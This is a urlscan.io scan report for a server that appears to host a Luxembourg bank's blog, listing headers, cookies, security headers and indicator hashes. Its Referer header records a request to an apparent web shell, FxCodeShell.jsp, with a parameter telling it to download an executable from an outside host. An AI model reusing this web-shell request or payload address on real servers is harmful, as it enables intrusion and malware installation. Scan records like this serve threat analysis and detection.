Expires: Wed, 04 Apr 2029 15:50:44 GMT

GET
H/1.1 200
OK / Show response
193.178.219.134/combo/ 4 KB
2 KB 39ms
38ms Script
text/javascript 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/combo/?browserId=other&minifierType=&languageId=en_US&b=6205&t=1553406106270&/html/js/aui/querystring-parse/querystring-parse-min.js&/html/js/aui/aui-url/aui-url-min.js

Requested by

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

6ff05fece485879fec5a99dda9fb636e3ac2ed097fb1d9c845523304abc28b0b

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; _ga=GA1.1.951552957.1554652248; _gid=GA1.1.1199922075.1554652248; _gat=1; _pk_id.4.2706=93e5212131e31c4b.1554652248.1.1554652248.1554652248.; _pk_ses.4.2706=*; LFR_SESSION_STATE_10161=1554652248322
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
Date: Sun, 07 Apr 2019 15:50:44 GMT
Connection: Keep-Alive
Content-Length: 1509
X-XSS-Protection: 1
Last-Modified: Sun, 24 Mar 2019 05:41:46 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "13a99901"
Vary: Accept-Encoding
Content-Type: text/javascript
Cache-Control: max-age=315360000, public
Keep-Alive: timeout=15, max=90
Expires: Wed, 04 Apr 2029 15:50:44 GMT

Verdicts & Comments Add Verdict or Comment

53 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

9 Cookies

Cookies are little pieces of information stored in the browser of a user. Whenever a user visits the site again, he will also send his cookie values, thus allowing the website to re-identify him even if he changed locations. This is how permanent logins work.

Domain/Path	Expires	Name / Value
193.178.219.134/	1970-01-19 09:16:47	Name: _pk_id.4.2706 Value: 93e5212131e31c4b.1554652248.1.1554652248.1554652248.
193.178.219.134/	1970-01-18 23:50:52	Name: _gat Value: 1
193.178.219.134/	1970-01-18 23:52:18	Name: _gid Value: GA1.1.1199922075.1554652248
193.178.219.134/	1970-01-18 23:50:54	Name: _pk_ses.4.2706 Value: *
193.178.219.134/	1970-01-19 17:22:04	Name: _ga Value: GA1.1.951552957.1554652248
193.178.219.134/	1969-12-31 23:59:59	Name: LFR_SESSION_STATE_10161 Value: 1554652248322
193.178.219.134/	1970-02-05 00:31:21	Name: COOKIE_SUPPORT Value: true
193.178.219.134/	1970-02-05 00:31:21	Name: GUEST_LANGUAGE_ID Value: en_US
193.178.219.134/	1969-12-31 23:59:59	Name: JSESSIONID_BLOGS_PRD Value: C468C0F781EF9B0B86ECDA13E8849B69

Security Headers

This page lists any security headers set by the main page. If you want to understand what these mean and how to use them, head on over to this page

Header	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Indicators

This is a term in the security industry to describe indicators such as IPs, Domains, Hashes, etc. This does not imply that any of these indicate malicious activity.

clients1.google.com
cse.google.com
stats.banquedeluxembourg.com
stats.g.doubleclick.net
www.google-analytics.com
www.google.com
www.google.de
193.178.219.134
193.178.219.143
2a00:1450:4001:809::200e
2a00:1450:4001:815::2003
2a00:1450:4001:817::2004
2a00:1450:4001:81a::200e
2a00:1450:4001:81e::200e
2a00:1450:400c:c0c::9b
038c71d557812646455d5eeebb9cf7925c8a47774b9c664acf12c7a41ba3f376
066f6b6a7156547c56d832c48edb36094447c070f21aef49a82cc803c604e313
0aeb79d2db9704564b484763a6a650c01503b724dfdc0dc89acc91414b4b4926
0c94eeab9c5d115290928dc922c13810c9aa10001aba3d1ef91215883ddebdb5
0ff2726ec7c599489cee32c064377b257c55c0816073f29a0e8156f0652f7ff2
20e11ce61890c08c0529911822233c9023ebc367df6c1050dec105e2b9628104
2372731315cbead498d6f05c7d3b92016db1b974181033fdccb003ab3ec7a9a3
271e12ee0f65c85124290c87dda1507f81e5e31476dc6c31be54206646bf2540
2be7477cc78c422582ae9cf9466c72a7769b807aa16a5bf2b162708ca36e11ec
2e0e4c2f987047705b227d076c5bb50381e016f3b85e1bfaddd672a756e61528
3c4a1bb7ce3234407184f0d80cc4dec075e4ad616b44dcc5778e1cfb1bc24019
3e552578c7d450b023f2cd9d28f830be4335c3acc6c4ab6dadda0769f09e5f22
4c54255f7c67fa7f3311311d2acadf399ed1d61dc9345980387bf79ae5f81e72
4d00df175e1d63fb82c37aa7ce214521fc94b2cc975db9ec260c2afd0a0153e4
4f51df044b76eabafab2fbf420871d472c8f3a629da79ec5fac75c530d79f266
548f2d6f4d0d820c6c5ffbeffcbd7f0e73193e2932eefe542accc84762deec87
590ee9fd7d08ba06adf6f2e743610e70a16e0981789d87744260e07963eb040a
5a0c41dabbf6518fd530918c761078a88c6c1f8fb0a3abdb5d5715da13fcfe4d
671036ec7a125397d386703d507a3c0af171725c0d1271d1ac0091a704c8197d
6a165bed92b991154cdd11bdfedcc0edf3d76e1b51f462593f2818eca6934b2e
6ff05fece485879fec5a99dda9fb636e3ac2ed097fb1d9c845523304abc28b0b
74e2d7534480b694da038fdad50cb5d4db1626836f12d450da4a929c1cd3787b
7f05331651d95c9439ac3d53d9fe98231684b3f692233a84f5c53d19cb56779d
80b32a9db0ef4f91ecb26477d09f76c3501fab2bcba7914d9407fea040954e6e
8337212354871836e6763a41e615916c89bac5b3f1f0adf60ba43c7c806e1015
85c58b63a0e663c83ccc2c4321cffdec5230f994d86447b7f94084119f161655
8cda73e6a0e5533a80c6bf94cf5a7b2a0e399ea1c482399b11a21096a8081faa
8f3dbff224b05a2f0a3a2273b3bdcb0dba3cdd8ce5e91aa91b2637b7980215eb
90ffa2a4f71361aadba6262f2de9437c5d77c5057072aa6d1f0df4bfe4869dfa
a295bcfa91664e0dfac547516febc524302c24be2ddb9cf90ceda80b1e8f19aa
a844cdc48c7591822e45128a138f1dbba5753a3ca9992bd71c36758d51d0b68e
a95f4875531b12642d2ef720c592e2ed845d57cc846f0386147e6ab24a268e3a
a970f1aebda9fbd643f5478ebd31ded53da17773400673e90d7bdef8f20079f8
d2c1d74b209046bbc1bfd56f501d7a4627c2c908abd05916eac528a5def808cc
d3c013517eb33ed0573e66c9d44236c8ca8d205fe1a1fe8bf2bfa9954b30dc04
d9d5e3f96a67d5fc7fa367e03c110bdf71b99eed38ef164529fe9aec38eb1582
e2bb83771b8fb190d17ca13302493e2c66d42a9fcba8002a7ab93510fac8134c
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
e5e47a45fb49db9914d3aa8788addcc661e6cc25f43bccf214cf7e14a39266d0
ea5bf205d1751589f41472ecdd252f11945717ad715ab67f6c3a0375e05ac465
ebf6b6b0f224b7d33dd0a33f05f3184f20c8eda7316cc2ab5ac98a31a920749f
ec5f1532c84858c293c4909c0d0db436b95de6d60be2f2e71dcabe7e2cc71111
ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
f03d1a004812ab36712ae519333d4751b14a69b34095defe062d6fed55d621fc
f7cb87b3b874204510782eb5e0eb0c8a0b66b4c2bd6191b56908e624d6048436

193.178.219.134 Open in urlscan Pro 193.178.219.134 Public Scan

Summary

urlscan.io Verdict: No classification

Domain & IP information

Screenshot Live screenshot Full Image

Page URL History Show full URLs

Detected technologies

Page Statistics

45 Requests

27 %HTTPS

75 %IPv6

5 Domains

7 Subdomains

7 IPs

2 Countries

733 kBTransfer

2040 kBSize

9 Cookies

7 Outgoing links

Page URL History

Redirected requests

45 HTTP transactions Everything HTML Script AJAX CSS Image Expand all 0 data transactions

Request headers

Response headers

Redirect headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Redirect headers

Request headers

Response headers

Request headers

Response headers

193.178.219.134 Open in urlscan Pro
193.178.219.134 Public Scan

Screenshot
Live screenshot

Full Image

45
Requests

27 %
HTTPS

75 %
IPv6

5
Domains

7
Subdomains

7
IPs

2
Countries

733 kB
Transfer

2040 kB
Size

9
Cookies

45 HTTP transactions
0 data transactions